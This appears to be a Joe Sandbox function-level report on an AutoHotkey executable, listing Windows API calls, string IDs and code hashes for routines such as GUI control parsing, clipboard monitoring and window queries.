                                      • Opcode ID: 68beabe2cb7879e7e19e99771c65c9ce90a0ffa2127e02a46bed2ff58b2cd8d1
                                      • Instruction ID: e4c97c33c2614dd2ddea619502ac656e20e26d5b986010cca5319a41639dd594
                                      • Opcode Fuzzy Hash: 68beabe2cb7879e7e19e99771c65c9ce90a0ffa2127e02a46bed2ff58b2cd8d1
                                      • Instruction Fuzzy Hash: DA213B72A8071835EA307704AC46FEA77555711B48F25011BF6483A2E2DAE5288586BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004A1856 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 004A7B9E
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A7BB3
                                      • UnhandledExceptionFilter.KERNEL32(004AF894), ref: 004A7BBE
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 004A7BDA
                                      • TerminateProcess.KERNEL32(00000000), ref: 004A7BE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 972a0c71bbef8eb281f1c355bedf6d8da6fa94e0f6dcddbe82cf2e05f5e95e8f
                                      • Instruction ID: d0ab9e3a606b9ffa2e6626f6de4c754e2a7cfe52b7389065873ed29831386083
                                      • Opcode Fuzzy Hash: 972a0c71bbef8eb281f1c355bedf6d8da6fa94e0f6dcddbe82cf2e05f5e95e8f
                                      • Instruction Fuzzy Hash: 7721EBB880A2049FCB20DF28EC856087BA4FB59304F80447FE909837A1F3B45881CF1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418020 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00418058
                                      • GetForegroundWindow.USER32(?,004169A2,?,00000000), ref: 004180A4
                                      • GetWindowTextW.USER32(00000000,0000000C,00000064), ref: 004180D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$CountForegroundTextTick
                                      • String ID: N/A
                                      • API String ID: 3416458291-2525114547
                                      • Opcode ID: 025f4445ed08e35966b1ed03e8739fea59b2925a1326a65f216d4131cf11008b
                                      • Instruction ID: 01253986ad48bb0da0d48170233c497b59cbfc29f417735a9771ee5affa97eb0
                                      • Opcode Fuzzy Hash: 025f4445ed08e35966b1ed03e8739fea59b2925a1326a65f216d4131cf11008b
                                      • Instruction Fuzzy Hash: 40319A31206201DFC718CF24E990AAABBE1EB8D310B01857FE446CB3A1DB349C42CB5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D870 Relevance: 6.1, APIs: 4, Instructions: 113filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(004B0CF8,?), ref: 0044D89F
                                      • GetLastError.KERNEL32 ref: 0044D8AA
                                      • FindClose.KERNEL32(00000000), ref: 0044D8E9
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044D940
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: File$FindTime$CloseErrorFirstLastLocal
                                      • String ID:
                                      • API String ID: 1380247339-0
                                      • Opcode ID: d8c953f07350e6d492d7481d5ae4296bc6a2a941ddd3899aa5fb8ebeb7312b30
                                      • Instruction ID: 72c8dd8c44dbd84428cf0feffc609ed1481b95ab264c779f8d5fa380fa7065da
                                      • Opcode Fuzzy Hash: d8c953f07350e6d492d7481d5ae4296bc6a2a941ddd3899aa5fb8ebeb7312b30
                                      • Instruction Fuzzy Hash: 273108B2A4430167E320EB54DC41FDB7798AB44725F14062BFD14E62D1DB79A94883AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00484030 Relevance: 6.1, APIs: 4, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00432BAF,?,004B0CF8), ref: 0048405E
                                      • IsWindowVisible.USER32(00000000), ref: 00484078
                                      • IsIconic.USER32(00000000), ref: 00484090
                                      • ShowWindow.USER32(00000000,00000009), ref: 0048409D
                                        • Part of subcall function 004846A0: GetForegroundWindow.USER32(?,?,?,0040F31B,004D8348,004B0CF8,00000000,00000000), ref: 004846E1
                                        • Part of subcall function 004846A0: IsWindowVisible.USER32(00000000), ref: 004846F6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundVisible$IconicShow
                                      • String ID:
                                      • API String ID: 4166660966-0
                                      • Opcode ID: 4e80f223073adcf5a97f4acd974d2d280820098eaa66209a35bd153a755b541b
                                      • Instruction ID: 72a7a70d27a104b732ab0c7b0a969515ae819dbc46fd46077a4c61dacf5a9325
                                      • Opcode Fuzzy Hash: 4e80f223073adcf5a97f4acd974d2d280820098eaa66209a35bd153a755b541b
                                      • Instruction Fuzzy Hash: 42213021A042078EDB30BF15E80472F73E8ABD3315F10891BE649962C1E77D9CC9875A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405430 Relevance: 6.1, APIs: 4, Instructions: 51clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0040544B
                                      • OpenClipboard.USER32(0002044A), ref: 0040545C
                                      • GetTickCount.KERNEL32 ref: 00405470
                                      • OpenClipboard.USER32(0002044A), ref: 004054AA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCountOpenTick
                                      • String ID:
                                      • API String ID: 420724667-0
                                      • Opcode ID: 943b752676c298d5d8ce0b57b5a37ad7194328055cc6d3ce3e93faa9a24a4fa5
                                      • Instruction ID: 5a2c79315bc2ab6014256f596f472cb258ffda3026dc413053941bdcf7d7cf30
                                      • Opcode Fuzzy Hash: 943b752676c298d5d8ce0b57b5a37ad7194328055cc6d3ce3e93faa9a24a4fa5
                                      • Instruction Fuzzy Hash: CA016D316216109BD710EB68EC84B9737A5EB9431AF148137E504E77D0CBB5DC95CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00481410 Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(02D91808,?,00000008,?,?,?,?,?,?,00445693,80000000,80000000), ref: 0048142F
                                      • IsIconic.USER32(00000000), ref: 0048143C
                                      • GetWindowRect.USER32(00000000,?), ref: 00481450
                                      • ClientToScreen.USER32 ref: 0048146E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ClientForegroundIconicRectScreen
                                      • String ID:
                                      • API String ID: 4031265896-0
                                      • Opcode ID: b9fbf26461994b4e550db32b16c81a8e6f4b5799a4119792cab0ebc523d34fff
                                      • Instruction ID: a224cd14b11e912ce0245c2df537cccb2ba9ea6f2f1e9c96f45049846b52b3b3
                                      • Opcode Fuzzy Hash: b9fbf26461994b4e550db32b16c81a8e6f4b5799a4119792cab0ebc523d34fff
                                      • Instruction Fuzzy Hash: 660184315042119BC310EF18C848BAFBBE8AFC5B10F05892EF89A47221E734D80697A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004813B0 Relevance: 6.0, APIs: 4, Instructions: 32windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000003,?,00000000,00415603,?), ref: 004813B4
                                      • IsIconic.USER32(00000000), ref: 004813C1
                                      • GetWindowRect.USER32(00000000,?), ref: 004813D7
                                      • ClientToScreen.USER32 ref: 004813F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ClientForegroundIconicRectScreen
                                      • String ID:
                                      • API String ID: 4031265896-0
                                      • Opcode ID: 5bf3df2ddf199f19f988c6dabd3ac2d37b7a4b324b1605b0fa9779e060c440b6
                                      • Instruction ID: ef43227c77fe4244feb7071e4ee5667d709072cf0f832542b1463e6d2df38ff4
                                      • Opcode Fuzzy Hash: 5bf3df2ddf199f19f988c6dabd3ac2d37b7a4b324b1605b0fa9779e060c440b6
                                      • Instruction Fuzzy Hash: 66F06D744053129BD310EF15C844A9F7BFCAF85741F40892AF84682221E338C90B8FAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A00E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Version__snwprintf
                                      • String ID: %u.%u.%u$10.0.19045
                                      • API String ID: 444779968-4060445884
                                      • Opcode ID: 2547c8b2c0ac6be14802c8af9b83a103e31ee8427db8fb390e16dd48019fa92e
                                      • Instruction ID: fa22d1e846a0ef56237d6413034975d7df6a34e03eb487fd149dbe67e6c2f83b
                                      • Opcode Fuzzy Hash: 2547c8b2c0ac6be14802c8af9b83a103e31ee8427db8fb390e16dd48019fa92e
                                      • Instruction Fuzzy Hash: 3A018F71647201DFC704CF59EC85AAA3BE0E74C744B92417FE80587366C7798890ABEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E430 Relevance: 4.5, APIs: 3, Instructions: 45clipboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(0002044A,00000415,00000001,00000000), ref: 0041E474
                                      • SetClipboardViewer.USER32(0002044A), ref: 0041E487
                                      • ChangeClipboardChain.USER32(0002044A,?), ref: 0041E4C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Clipboard$ChainChangeMessagePostViewer
                                      • String ID:
                                      • API String ID: 1822368796-0
                                      • Opcode ID: 18ea1e5fd26aa9e1efd105072f5c381c59705bbc9ff5efda4149b90fa229d241
                                      • Instruction ID: 615a4a8381e90c97df675dd18c19a9baef449b849928be8fe3ed95bbf508b358
                                      • Opcode Fuzzy Hash: 18ea1e5fd26aa9e1efd105072f5c381c59705bbc9ff5efda4149b90fa229d241
                                      • Instruction Fuzzy Hash: D1013C74652340EBDB20DB74EC44B963BE4E745388F09452AE949873A2C3789850C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F450 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetComputerNameW.KERNEL32(?), ref: 0044F474
                                      • GetUserNameW.ADVAPI32(?,?), ref: 0044F485
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Name$ComputerUser
                                      • String ID:
                                      • API String ID: 4229901323-0
                                      • Opcode ID: 484acdd6b1c0c57ed577efa55293d0ceabe5b9d93c65d1706b9fa83a50fc031c
                                      • Instruction ID: 2eec10a07e1b708c8ddde2035b577e4f1299c94cc13578faf3904e75852fd6a6
                                      • Opcode Fuzzy Hash: 484acdd6b1c0c57ed577efa55293d0ceabe5b9d93c65d1706b9fa83a50fc031c
                                      • Instruction Fuzzy Hash: A1019A315082018BD724DF64C948BAB77F1FFA8300F44892DE89A87290FB7CDA08C786
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D3F0 Relevance: .1, Instructions: 145COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
                                      • Instruction ID: 8206dfc3c2418993cb92ddc6cedfdf08c38ab9b00d48e98c4988ffc1690278e1
                                      • Opcode Fuzzy Hash: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
                                      • Instruction Fuzzy Hash: 8A41F0979189110FFB100919B8F23F3ABD2CBB2332F558567D1D443BC2D22AA98FD650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C120 Relevance: 94.7, APIs: 27, Strings: 27, Instructions: 219COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: ActiveX$Button$Checkbox$ComboBox$Custom$DDL$DateTime$DropDownList$Edit$GroupBox$Hotkey$Link$ListBox$ListView$MonthCal$Pic$Picture$Progress$Radio$Slider$StatusBar$Tab$Tab2$Tab3$Text$TreeView$UpDown
                                      • API String ID: 3832890014-2446625512
                                      • Opcode ID: 0c9813ba75d5d7f9bb8611c3a2c34c497686d360695a120f654efb874f00ab1e
                                      • Instruction ID: 8e6eefcf677a37afb30473ab4d9297b716c2d685bf85666f1be762190c1a4142
                                      • Opcode Fuzzy Hash: 0c9813ba75d5d7f9bb8611c3a2c34c497686d360695a120f654efb874f00ab1e
                                      • Instruction Fuzzy Hash: 6A51D25DEC1A11325E15352A2E43BDF26881C21B4BBC4447FFC14A4342F78EEA5AE0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B7F0 Relevance: 89.5, APIs: 26, Strings: 25, Instructions: 215COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: ACos$ASin$ATan$Abs$Asc$BitAnd$BitNot$BitOr$BitShiftLeft$BitShiftRight$BitXOr$Ceil$Chr$Cos$Deref$Exp$Floor$HTML$Log$Mod$Pow$Round$Sin$Sqrt$Tan
                                      • API String ID: 3832890014-879508146
                                      • Opcode ID: 59ba3e320e0dd33247e86ee0a6514d634571ec893d2a737da14127a418b879b6
                                      • Instruction ID: e2e877aa6906a3876d3d4ab0c8446477b55f34a616459166d3f4f64c590871d9
                                      • Opcode Fuzzy Hash: 59ba3e320e0dd33247e86ee0a6514d634571ec893d2a737da14127a418b879b6
                                      • Instruction Fuzzy Hash: 23515969B41A0132EE11302E5E03BDF64899F61B4BFC4847BFC08C5281F78EDA4690EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C470 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Add$Check$Choose$ChooseString$Delete$Disable$EditPaste$Enable$ExStyle$Hide$HideDropDown$Show$ShowDropDown$Style$TabLeft$TabRight$Uncheck
                                      • API String ID: 3832890014-3688457572
                                      • Opcode ID: 056f84e6500b89c183b62c059faa8617a6f0616dad51a137515ef0a9a638aebd
                                      • Instruction ID: 7e664702d1de0f518fc54228fd96b846c2e5a3abcbed55658410ec64fc75da02
                                      • Opcode Fuzzy Hash: 056f84e6500b89c183b62c059faa8617a6f0616dad51a137515ef0a9a638aebd
                                      • Instruction Fuzzy Hash: 42316C69B81A2032EE11212E4E53BDF64895B61B4BFC4447BFC04D4281F78EEE5190AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00481180 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Aqua$Black$Blue$Default$Fuchsia$Gray$Green$Lime$Maroon$Navy$Olive$Purple$Red$Silver$Teal$White$Yellow
                                      • API String ID: 3832890014-3452233305
                                      • Opcode ID: e953cf14bfa1a87d2d2c328e50c44b784998a4171aaea69d5b5251f51353cb09
                                      • Instruction ID: 726b28583ebca500ab2d58dbbd22713e2767284c0cfe0b2a653e5f0a47bbdd49
                                      • Opcode Fuzzy Hash: e953cf14bfa1a87d2d2c328e50c44b784998a4171aaea69d5b5251f51353cb09
                                      • Instruction Fuzzy Hash: 08313E4DB4161122EF55326E1D02B9F24886F6174BFD4497FFC10D1392FB8EDA0A92AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047E530 Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 225COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AtEOF$Close$Encoding$Failed to connect to an active debugger client.$FileObject$Handle$Length$Line$Pos$Position$RawRead$RawWrite$Read$Seek$Tell$Write$__Handle
                                      • API String ID: 0-3077144313
                                      • Opcode ID: a799f9cc4942b253c6be35b22cc1a867ff1cb94cb7c810deada22efb6e8465fb
                                      • Instruction ID: efa3de3124102ef219fdaca7b61e9f37e6a83230580533ca16219c6744846b1c
                                      • Opcode Fuzzy Hash: a799f9cc4942b253c6be35b22cc1a867ff1cb94cb7c810deada22efb6e8465fb
                                      • Instruction Fuzzy Hash: 0F612C31A0010466DB1456278D41FEB33A85B2930AF95C2BFEC0DAB351F76DED06D6AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004715F0 Relevance: 56.4, APIs: 25, Strings: 7, Instructions: 375COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0047163F
                                      • GetStockObject.GDI32(00000011), ref: 00471649
                                      • GetDC.USER32(00000000), ref: 0047166A
                                      • SelectObject.GDI32(00000000,?), ref: 00471692
                                      • GetTextFaceW.GDI32(00000000,0000003F,-004DA644), ref: 004716AB
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 004716BA
